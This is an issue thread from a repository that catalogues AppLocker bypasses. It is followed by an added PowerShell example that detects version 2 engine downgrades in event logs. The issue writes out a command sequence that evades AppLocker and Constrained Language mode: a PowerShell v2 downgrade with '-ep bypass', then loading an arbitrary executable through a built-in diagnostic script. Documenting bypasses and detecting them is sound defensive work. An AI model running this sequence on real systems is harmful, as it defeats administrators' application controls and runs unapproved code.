api0cradle/UltimateAppLockerByPassList

CL_LoadAssembly.ps1 - Similar to already listed CL_Invocation.ps1 and PowerShell version 2


You might want to add this:

powershell -v 2 -ep bypass
cd C:\windows\diagnostics\system\AERO
import-module .\CL_LoadAssembly.ps1
LoadAssemblyFromPath ........\temp\funrun.exe
[funrun.hashtag]::winning()

Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default rules: Yes
Bypasses Constrained Language mode by invoking PowerShell version 2
Notes: Requires PowerShell version 2

Links:
https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/

I removed the CL_Invocation since it relies on PowerShell v2. So the bypass is actually PowerShell version 2 and it is listed in the generic bypasses. Thanks for pointing it out.
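
Because the reply attributes the bypass to the PowerShell version 2 engine, a defender can look for 2.0 engine starts in the classic "Windows PowerShell" log (event ID 400). The following is an added example, not part of the issue or the repository; the function name and the sample events are constructed for illustration.

```powershell
# Added example: flag engine-start records (event ID 400) that ran the 2.0 engine.
# Find-PSv2EngineStart is a hypothetical helper name, not a built-in cmdlet.
function Find-PSv2EngineStart {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        if ($e.Id -ne 400) { continue }
        # Event 400 carries "EngineVersion=<version>" on its own line in the message.
        if ($e.Message -match '(?m)^\s*EngineVersion=(2\.\d+)') {
            $engine = $Matches[1]   # save before the next -match overwrites $Matches
            $hostApp = if ($e.Message -match '(?m)^\s*HostApplication=(.*)$') {
                $Matches[1].Trim()
            } else { '' }
            [pscustomobject]@{
                TimeCreated     = $e.TimeCreated
                EngineVersion   = $engine
                HostApplication = $hostApp
            }
        }
    }
}

# Constructed sample records shaped like event 400 messages (not real log data).
$sample = @(
    [pscustomobject]@{
        Id = 400; TimeCreated = [datetime]'2024-01-01T10:00:00'
        Message = "Engine state is changed from None to Available.`n`tHostApplication=powershell -v 2 -ep bypass`n`tEngineVersion=2.0"
    },
    [pscustomobject]@{
        Id = 400; TimeCreated = [datetime]'2024-01-01T10:05:00'
        Message = "Engine state is changed from None to Available.`n`tHostApplication=powershell.exe`n`tEngineVersion=5.1.19041.1"
    }
)

# Only the first record is reported; the 5.1 engine start is ignored.
Find-PSv2EngineStart -Events $sample

# Against a live host, feed real events instead of the sample:
#   Find-PSv2EngineStart -Events (Get-WinEvent -FilterHashtable @{ LogName = 'Windows PowerShell'; Id = 400 })
# On client Windows, check from an elevated prompt whether the 2.0 engine is still installed:
#   Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root
```

If the optional feature reports as enabled and nothing depends on it, removing it with `Disable-WindowsOptionalFeature` takes away the downgrade path that the version 2 engine provides.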